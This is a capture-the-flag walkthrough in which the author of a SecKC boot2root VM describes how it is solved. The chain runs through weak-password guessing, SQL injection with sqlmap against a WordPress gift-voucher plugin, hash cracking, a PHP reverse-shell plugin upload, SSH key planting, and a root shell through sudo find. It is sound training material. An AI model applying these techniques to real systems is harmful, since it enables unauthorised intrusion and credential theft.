This was the first boot2root that I created and quite frankly, I had a blast creating it. I learned a lot from creating this VM. To be honest, creating something vulnerable and having it be 'solvable' takes a lot of time, trial and error and testing in order for it to be successful. Now, was this successful? It is yet to be seen, but within 12 hours of publishing the VM, someone on twitter took a screen cap of the root flag. I'd like to think it was successful :)
Now, I'm waiting to publish a walkthrough (at least how I envisioned this walkthrough) until more people have had a chance to attempt it.
But here is a sneak peak on how I envisioned this boot2root to be solved:
I made this VM with a static IP address (192.168.9.184)
We first run nmap against this IP and discover 3 open ports:
We first go to port 80 and are presented with the following redherring:
This page is nothing more than a SecKC image.
Let's look at port 8888:
Oh wow. Lots of information here. Let's check out the whole page:
SecKC Kansas City's Hacker Hive Kansas City! The city of fountains! Did you know the Chiefs won SUPER BOWL LIV?! Oh, and the Royals won THE WORLD SERIES in 2015?! Oh manm, that's a lot of awesome. But did you know that Kansas City has the largest Monthly InfoSec meet-up? That's right! SecKC hosts the largest monthly meet-up EVERY. MONTH. root@kali:/rapid7/metasploit-framework:master$ MSFLOGO="data/logos/haKCers.txt" ./msfconsole `:oDFo:` ./ymM0dayMmy/. -+dHJ5aGFyZGVyIQ==+- `:sm⏣~~Destroy.No.Data~~s:` -+h2~~Maintain.No.Persistence~~h+- `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:` ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/. -++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+- -~/.ssh/id_rsa.Des- `htN01UserWroteMe!- :dopeAW.No.nano.o :is:TЯiKC.sudo-.A: :we're.all.alike'` The.PFYroy.No.D7: :PLACEDRINKHERE!: yxp_cmdshell.Ab0: :msf:exploit -j. :Ns.BOB.ALICEes7: :---srwxrwx:-.` `MS146.52.No.Per: :.script..Ac816/ sENbove3101.404: :NT_AUTHORITY.Do `T:/shSYSTEM-.N: :09.14.2011.raid /STFU|wall.No.Pr: :hvensntSurb025N. dNVRGOING2GIVUUP: :#OUTHOUSE- -s: /corykennedyData: :$nmap -oS SSo.6178306Ence: :Awsm.da: /shMTl#beats3o.No.: :Ring0: `dDestRoyREXKC3ta/M: :23d: sSETEC.ASTRONOMYist: /- /yo- .ence.N:(){ :|: };: `:Shall.We.Play.A.Game?tron/ ```-ooy.if1ghtf0r+ehUser5` ..th3.H1V3.U2Vgeoda.jMh+.` `MjM~~WE.ARE.se~~MMjMs +~KANSAS.CITY's~-` J~HAKCERS~./.` .esc:wq!:` +++ATH` ` =[ metasploit v5.0.61-dev-618a7c9771 ] + -- --=[ 1947 exploits - 1089 auxiliary - 333 post ] + -- --=[ 556 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] msf5 > Destroy No Data Maintain No Persistence Above Else, Do No Harm Bob Bob Bob and Alice Alice Alice Random Name Swag Represent SecKC with swag! CONTACT seckc.org Kansas City, USA Email: info@seckc.org Powered by HAKCERs
Lots of great information on SecKC and Kansas City! Let's run dirb to see if we can reach any other pages:
Hmm. Nothing. Let's run CeWL to build a wordlist from this page to see if there's any directories we aren't seeing due to the "common.txt" wordlist we've been using:
Alright, let's try dirb again, this time with our new wordlist:
Sweet! We found a new directory "/SecKCTheWorld/". Let's check it out
Oh, look at that.. a login and registration page! Let's register an account:
Now let's login:
Sweet. Looks like there'a another tab for "Attention Members!". Let's look at it
Looks like SecKC members can use Gift Vouchers for SWAG. Nice. Unfortunately, we can't get to it. Looks like "HAKCER" made the post and said that only super special members such as himself can access it. You know what? Let's see if we can hakc him!
We try logging in as hakcer with password as hakcer:
Ah-ha! We logged in as Hakcer! What a bad password. Looks like we have yet another option for "Gift Voucher" this time.
Looks like you can go through creating a gift voucher. We should also be using Burp Suite to proxy our process.. maybe there's a vulnerability here?
After submitted the first stage of the gift voucher, we notice in our burp history that there's a POST method with 2 parameters: "Action" and "template_id". To speed up our discovery process, if we search exploit-db, we will find that WordPress Plugin Gift Voucher 1.0.5 is vulnerable to a SQL Injection vulnerability: https://www.exploit-db.com/exploits/45255
We decide to take the above POST request and run it through sqlmap.
POST /SecKCTheWorld/wp-admin/admin-ajax.php HTTP/1.1 Host: 192.168.9.184:8888 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.9.184:8888/SecKCTheWorld/index.php/gift-voucher/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 47 Connection: close Cookie: wordpress_ff07ddea9d328682b5f743aa9e2cfddd=hakcer%7C1594576785%7CwFPSArCyw5nXbsFdIFSrmvRYQ2i9s1AbwyfZGhaR4cd%7Cec080ddf7e4079de895120e152128f1aa3a4dac613153abcc2b6925df4c5f832; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_ff07ddea9d328682b5f743aa9e2cfddd=hakcer%7C1594576785%7CwFPSArCyw5nXbsFdIFSrmvRYQ2i9s1AbwyfZGhaR4cd%7C9e99f7262caa50b25a14620fcb6fa1d60eddb1d23094354e7d1ec0ad7b7c7208 action=wpgv_doajax_front_template&template_id=*
Again, to speed up our test, we can use the following:
- --level 5
- --risk 3
- --technique B
- --dbms MySQL
- specify the template_id parameter
We let sqlmap do its thing:
As shown above, we confirm that SQL Injection is present. Now, let's dump the database.
To speed up testing, we can use the following (again, since I wrote this, I know where I am looking). But let's use the following commands to dump our database:
- -D wordpress
- -T wp_users
- -C user_login,user_pass
- --dump
Looks like we have an admin hash! We already know hakcer's password, and geoda is our own. Let's see if we can crack this hash!
We take it to john the ripper, only using the password hash and using the rockyou wordlist
After JTR is complete, we see that the password for admin is "abc123". Let's log into wordpress as the admin user now.
Excellent. Now that we are logged in as admin, let's upload a reverse shell via the plugin. We first create the reverse shell php file
Next, we zip the file
Upload the shell.zip as a plugin:
And install
After starting our netcat listener on port 4444, we activate the plugin
Boom. We now have a shell on the system as www-data
To speed things up, we find a backup file owned by the user chiefs
We look inside the file
We find the username and password for the user chiefs. We now can ssh directly to the system as the chiefs user
Now that we have direct access as a valid user, we continue our enumeration.
We notice that inside the /home/royals directory our user (chiefs) who's in the chiefs group, has the ability to write to the royals users ssh authorized hosts file.
How can we exploit this? Well, we can actually create an ssh key on our attacker machine, upload it to the authorized keys directory, and ssh into the system as the royals user. Let's see how this is done.
For complete simplicity sake and educational purposes, we can just use ssh-keygen to generate an ssh key
As you can see, we have both a private key '/home/kali/.ssh/id_rsa' and a public key '/home/kali/.ssh/id_rsa.pub'
We can copy the public key contents into the authorized_keys folder, as shown below
The above shows our id_rsa.pub key. The below shows it inside the authorized_keys file on the victim machine
Now, with everything set up, we can ssh with our private key as the royals user:
Success. We are now running as the royals user
We continue enumeration, looking for a way to elevate further. We speed this up since I already know what I'm looking for.
We notice above that if we check the sudoers file for this user, we have the ability to run /usr/bin/find as root, without a password.
We can actually exploit this by doing the following:
Sweet! We are now running as root! Let's grab the flag!
royals@seckc:~$ whoami royals royals@seckc:~$ sudo find / -exec /bin/bash \; root@seckc:~# whoami root root@seckc:~# id uid=0(root) gid=0(root) groups=0(root) root@seckc:~# cd /root root@seckc:/root# ls flag.txt root@seckc:/root# cat flag.txt .cllllllllllooool. .,::,. .;::::. .cddollc::::;,. :XMMMMMMMMMMMMMMX; '0MM0' .c0WWNO:. :KWWWWWWWXKXWWN0l ;KMMWOllcccc:::::. ,0MM0, ,kWMWO;. .dWWXd;;;;,',o0XNN ;XMMWl .. .;:,'''''. ..'''...... ;KMMXc .oXMMXl. dWMX; .lkxd ;KMMWk:loolllll:. 'dKWWWNNNNNXk:. 'dKXNNNXNXXX0x:. :XMWk,:0WMWO, oWMX: .'.. ,KMMMWWMMMMMMMMWKc. .xWWXxoododOWMWd. .OWMXkdxxddxXMMXc :XMWkkNMMMKo;. oWMNc 'kXXK0dccllccxNMMO. .kWW0;.....lXMMk. '0MMx. ckkx, :XWWWWMMMMN0; oWMNc .,,.. ,KMM0' .ONOkKXXXXKNWMMx. '0MM0, lNWWMWOoONWK: lNMNl ,dkd, ,KMM0' .OXxodddddxxxxx: '0MMK; ... .OMMW0c. .cKMXo. lNMNl .cxxd '0MMMk'......cXMM0' .OMWk' 'odd; '0MMO,.. .'ldkO; '0MMX: .:0WMNx. cNMWd. .. .,OMMX .OMMMNKKKKKKXNWMWx. .dWMN0OOx:;xWMNo .xWMN0O0000KNNXd. ,0MMK, .;.,OWMWx. ;KWMN0000000KWMWO .o0XXXKXKKKKKKOc. .:k000K0Ok0Kk:. .ck0KK000KK0x; .xKKx. ,. .cccc. ,d0K000K000KKOl. ............ ......... ......... ... .. ....... ... Woot!! Congratulations on solving the challenge! If you are interested in learning more about SecKC, visit us at seckc.org or join oug #Slack channel: http://slack.seckc.org Created by: Eric "geoda" Guillen
And that's it! I hope you enjoyed this boot 2 root intentionally vulnerable virtual machine. I certainly enjoyed building it and I'm sure I'll build more in the future. Please reach out with any questions.
Till next time!